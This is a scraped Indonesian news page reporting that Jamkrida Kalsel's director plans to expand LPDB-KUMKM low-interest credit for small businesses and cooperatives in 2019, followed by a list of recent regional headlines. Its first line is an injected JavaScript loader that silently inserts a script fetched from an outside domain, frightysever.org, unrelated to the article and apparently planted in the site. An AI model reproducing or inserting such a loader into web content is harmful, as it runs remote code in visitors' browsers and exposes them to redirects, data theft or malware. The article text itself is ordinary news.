(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Bisnis

Jamkrida Kalsel Maksimalkan Program LPDB-KUMKM di Tahun 2019


BANJARMASIN, Direktur Utama Jaminan Kredit Daerah (Jamkrida) Kalsel Rizqillah Suhaili menargetkan mampu memaksimalkan program kredit bersumber dari Lembaga Pengelola Dana Bergulir-Koperasi Usaha Mikro Kecil Menengah (LPDB-KUMKM) pada tahun 2019 mendatang.

Menurut Rizqi, sebenarnya program LPDB-KUMKM sudah dikerjasamakan dengan Jamkrida Kalsel pada tahun 2018. Namun karena tool terkait standar sistem pengajuannya belum dibuat, maka pihaknya kesulitan dalam penerapannya.

“Ini kita mulai garap sebenarnya program LPDB-KUMKM, namun dengan menggunakan tool yang seadanya. Direncanakan memang tool-nya selesai dibuat sebelum akhir tahun 2018, kalau hal tersebut bisa dicapai kita akan garap program ini dengan serius pada tahun 2019 mendatang,” tegasnya, Kamis (25/10).

Bagi Rizqi, kehadiran program LPDB-KUMKM sangatlah membantu pihaknya dalam mendorong permodalan untuk pengembangan usaha bagi UMKM maupun Koperasi di Banua yang menjadi binaan Jamkrida Kalsel.

Bahkan diklaimnya, program LPDB-KUMKM jauh lebih bisa memberikan bunga rendah bagi UMKM maupun Koperasi. Karena program ini hanya membebankan bunga sebesar 4-7 persen dengan jangka waktu maksimal sekitar 3 tahun pinjaman.

“Agar bisa maksimal penyerapan nantinya, kami juga berencana menggarap pasar di luar dari UMKM atau pun Koperasi yang pernah Jamkrida Kalsel berikan jaminan kredit,” tambahnya.

Diklaim Rizqi, mulai sejak berdirinya PT Jamkrida Kalsel hingga sekarang ada sekitar 3.700 UMKM yang diberikan jaminan kredit dengan penyerapan tenaga kerja yang mencapai sekitar 21.000 orang.

Adapun jumlah kredit yang bisa mereka jamin sendiri hingga sekarang sudah mencapai Rp 1,27 triliun dengan modal yang dimiliki dari Pemprov Kalsel yang jumlahnya sudah tembus diangka Rp 70 miliar.

“Kehadiran program LPDB-KUMKM ini tentunya bisa menambah manfaat Jamkrida Kalsel bagi UMKM maupun Koperasi. Karena kita kini bukan hanya bisa memberikan jaminan, namun juga mampu menyalurkan kredit,” pungkasnya. (arief)

Reporter : Arief
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

13 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

14 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

17 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

18 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

19 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

21 jam ago

This website uses cookies.